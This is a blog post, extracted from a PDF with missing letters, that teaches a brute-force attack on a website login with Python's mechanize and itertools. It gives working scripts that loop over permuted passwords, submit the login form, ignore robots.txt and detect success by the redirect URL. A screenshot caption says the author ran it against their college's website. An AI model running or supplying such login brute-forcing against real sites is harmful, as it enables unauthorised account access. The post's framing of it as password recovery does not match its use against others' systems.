Professional Documents
Culture Documents
Coder In Aero
POSTED BY
TEJA R D
POSTED ON
DECEMBER 8, 2014
POSTED UNDER
HACKING, PYTHON
COMMENTS
LEAVE A COMMENT
(h ps://coderinaero.files.wordpress.com/2014/12/main.jpg)
Screen shot of python script running brute-force a ack on my college’s website.
This post gives brief introduction to Brute Force A ack, Mechanize in Python for web
browsing and explains a sample python script to brute force a website login.
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 1/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero
Brute force is the easiest way one can implement to recover lost passwords (Yet it can take
literally ages to crack one). Basically, this involves checking all possible combinations of
passwords until the right one is found. This can be really helpful when characters in the
password is known but not the correct combination, here possible combinations decrease
drastically. Following paragraph gives a vague idea of how much time it can take to find
right combination in the worst case scenario.
Suppose the length of password is N and we know nothing about characters present in the
string, possible characters can be all alphabets (upper and lowercase), numbers (0-9) and
special characters (~, @, #, $, ^), thus each character of the password string can be any of
the above 67 characters which leads to a total of 67^N combinations (as you can clearly see
it increases exponentially with the length). If we are brute forcing a website login, time
taken significantly depends on the internet speed, for instance it can do four login checks
per second, it takes nearly 58 hours to crack a password of four character length. Suppose
if we know the characters, we can find the correct combination in 64 seconds, far less than
previous case.
Mechanize
Easy Install:
easy_install mechanize
Pip:
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 2/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero
import mechanize
br = mechanize.Browser()
response = br.open(url)
br.method = "POST"
response = br.submit()
print response.geturl() #url to which the page has redirected after log
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 3/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero
We will use Python’s core module ‘itertools’ for generating possible password
combinations.
#!/usr/bin/python
import mechanize
import itertools
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False) #no robots
3. Generating combinations
If you know characters in the password. (Go through itertools docs for more info.)
combinations = itertools.permutations("i34^UhP#",8)
#takes characters and length of string to generate as arguments(no repe
combinations =itertools.permutations("a-zA-Z0-9!@#$%^",n)
1 #!/usr/bin/python
2 import mechanize
3 import itertools
4
5 br = mechanize.Browser()
6 br.set_handle_equiv(True)
7 br.set_handle_redirect(True)
8 br.set_handle_referer(True)
9 br.set_handle_robots(False)
10
11 combos = itertools.permutations("i3^4hUP-",8)
12 br.open("h p://www.example.com/login/")
13 for x in combos:
14 br.select_form( nr = 0 )
15 br.form['userName'] = "user name"
16 br.form['password'] = ''.join(x)
17 print "Checking ",br.form['password']
18 response=br.submit()
19 if response.geturl()=="h p://www.example.com/redirected_to_url":
20 #url to which the page is redirected after login
21 print "Correct password is ",''.join(x)
22 break
view raw brute_force.py hosted with by GitHub
Troubleshooting errors
Most the time i ended up ge ing this error even though there is a form element in the
page. I thought this might be due to bad HTML in the page. Anyway you can solve this
error by changing the form element in the browser object (copy the form element from the
page’s HTML ). Here is the new code snippet:
1 #!/usr/bin/python
2 import mechanize
3 import itertools
4
5 br = mechanize.Browser()
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 5/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero
6 br.set_handle_equiv(True)
7 br.set_handle_redirect(True)
8 br.set_handle_referer(True)
9 br.set_handle_robots(False)
10
11 combos=itertools.permutations("i34U^hP-",8)
12 r =br.open("h ps://www.example.com/login/")
13 for x in combos:
14 new_form = '''
15 <form method="post" action="index.php">
16 <b>Enter the username :</b><input type="text" name="rollno" size="16" maxleng
17 <b>Enter the password:</b><input type="password" name="pwd" size="16">
18 <input type="submit" name="submit" value="Submit">
19 </form>
20 '''
21 #all you have to take care is they have the same name for input fields and submi
22 r.set_data(new_form)
23 br.set_response(r)
24 br.select_form( nr = 0 )
25 br.form['userName'] = "user name"
26 br.form['password'] = ''.join(x)
27 print "Checking ",br.form['password']
28 response=br.submit()
29 if response.geturl()=="h p://www.example.com/redirected_to_url":
30 #url to which the page is redirected after login
31 print "Correct password is ",''.join(x)
32 break
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 6/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 7/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 8/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero
Offensive Offensive
Broken Broken
Blog at WordPress.com.
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 10/10